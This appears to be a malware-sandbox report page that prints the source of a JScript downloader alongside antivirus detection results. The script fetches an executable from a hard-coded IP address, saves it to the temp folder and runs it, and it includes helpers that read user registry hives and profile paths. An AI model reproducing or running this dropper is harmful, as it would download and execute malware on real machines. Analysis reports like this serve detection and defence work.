popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
var fs = new ActiveXObject("Scripting.FileSystemObject");
var shell = new ActiveXObject("WScript.Shell");
var url = "http://165.22.242.147/builds/1.exe";
to = WScript.Arguments(1);
} catch(err) {
to = null;
if (!to) {
myObject = new ActiveXObject("Scripting.FileSystemObject");
name = myObject.GetSpecialFolder(2);
to = name;
if (download(url, to)) {
WScript.Quit(0);
} else {
WScript.Quit(1);
function download(url, to, opts) {
opts = opts || {};
var fs = new ActiveXObject("Scripting.FileSystemObject");
var http = new ActiveXObject("MSXML2.ServerXMLHTTP.3.0");
var path = fs.getAbsolutePathName(to);
var filename = /([^\/]*)$/.exec(url)[1];
var filepath = fs.BuildPath(path, filename);
http.setOption(2,13056);
if (!fs.FolderExists(path)) {
// Criar pasta se nao existir
fs.CreateFolder(path);
// Gets the file
http.open("GET", url, false);
http.send();
if (http.status >= 200 && http.status < 300) {
var Stream = WScript.CreateObject('ADODB.Stream');
Stream.Open();
Stream.Type = 1;
Stream.Write(http.responseBody);
Stream.Position = 0;
if (fs.FileExists(filepath))
fs.DeleteFile(filepath);
Stream.SaveToFile(filepath, 2);
Stream.Close();
var WSH = new ActiveXObject("WScript.Shell");
WSH.run(filepath);
return true;
function getComputerName() {
var oShell = new ActiveXObject("WScript.Shell");
return oShell.ExpandEnvironmentStrings("%COMPUTERNAME%");
function getSID(strUser, strDomain) {
var oAccount = GetObject("winmgmts:root/cimv2:Win32_UserAccount.Name='" + strUser + "',Domain='" + strDomain + "'");
return oAccount.SID;
function getProfilePath(strSID) {
var oShell = new ActiveXObject("WScript.Shell");
var strValue = oShell.RegRead("HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\" + strSID + "\\ProfileImagePath");
return strValue;
function getAppData(strSID) {
var oShell = new ActiveXObject("WScript.Shell");
var strValue = oShell.RegRead("HKEY_USERS\\" + strSID + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\AppData");
return strValue;
function loadHKUHive(strKeyName, strHiveFile) {
var oShell = new ActiveXObject("WScript.Shell");
oShell.Run("reg load HKU\\" + strKeyName + " " + strHiveFile, 0, true);
function unloadHKUHive(strKeyName) {
var oShell = new ActiveXObject("WScript.Shell");
oShell.Run("reg unload HKU\\" + strKeyName, 0, true);
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
FireEye Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
VirIT Clean
Cyren JS/Agent.SU!Eldorado
Symantec ISB.Downloader!gen60
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Rising Clean
Sophos Clean
Baidu Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro HEUR_HTMJS.D
McAfee-GW-Edition BehavesLike.JS.Exploit.xm
CMC Clean
Emsisoft Clean
GData Clean
Jiangmin Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Downloader.Script.Generic
Microsoft Clean
Google Detected
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
ALYac Clean
TACHYON Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet JS/Agent.OFV!tr.dldr
AVG Clean
Panda Clean
No IRMA results available.